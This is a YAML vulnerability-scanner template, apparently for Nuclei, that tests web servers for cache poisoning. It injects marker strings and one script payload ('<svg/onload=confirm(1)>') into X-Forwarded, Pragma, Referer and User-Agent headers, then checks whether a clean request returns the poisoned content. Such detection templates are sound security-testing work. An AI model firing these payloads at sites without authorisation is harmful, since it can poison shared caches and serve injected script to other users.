id: cache-poisoning-xforwarded11

info:
  name: Cache Poisoning Detection - X-Forwarded Headers Injection11
  author: xandsz
  severity: medium
  description: |
    Testa a possibilidade de envenenamento de cache manipulando headers `X-Forwarded-*`, `Cache-Control`, `Pragma`, `Referrer`, `User-Agent` e outros, verificando se o conteúdo injetado persiste na resposta cacheada.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cwe-id: CWE-601
  metadata:
    max-request: 3
  tags: cache, poisoning, x-forwarded, injection, fuzzer

http:
  # Primeira requisição - Envenenar o cache com headers manipulados
  - raw:
      - |
        GET /?cb=3332 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: "><xand>
        X-Forwarded-For: "><xand>
        X-Original-URL: "><xand>
        X-Rewrite-URL: "><xand>
        X-Forwarded-Server: "><xand>
        X-Forwarded-Proto: "><xand>
        X-Real-IP: "192.168.1.100">"><xand>
        X-Requested-With: "XMLHttpRequest">"><xand>
        Cache-Control: "no-cache">"><xand>
        Pragma: "no-cache"><svg/onload=confirm(1)>
        Accept-Encoding: "gzip, deflate">"><xand>
        Referer: "><xand>
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/107.0"><xand>
        X-Forwarded-Scheme: ">"><xand>
    stop-at-first-match: true

  # Segunda requisição - Repetir headers para reforçar o envenenamento
  - raw:
      - |
        GET /?cb=3332 HTTP/1.1
        Host: {{Hostname}}
        X-Forwarded-Prefix: "><xand>
        X-Forwarded-For: "><xand>
        X-Original-URL: "><xand>
        X-Rewrite-URL: "><xand>
        X-Forwarded-Server: "><xand>
        X-Forwarded-Proto: "><xand>
        X-Real-IP: 192.168.1.100">"><xand>
        X-Requested-With: "XMLHttpRequest">"><xand>
        Cache-Control: "><xand>
        Pragma: "><xand>
        Accept-Encoding: "><xand>
        Referer: "><xand>
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/107.0"><xand>
        X-Forwarded-Scheme: "><xand>
    stop-at-first-match: true

  # Terceira requisição - Testa se o conteúdo foi envenenado (SEM HEADERS)
  - raw:
      - |
        GET /?cb=3332 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/107.0
    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><xand>'  # Verifica se o payload aparece no HTML da resposta final
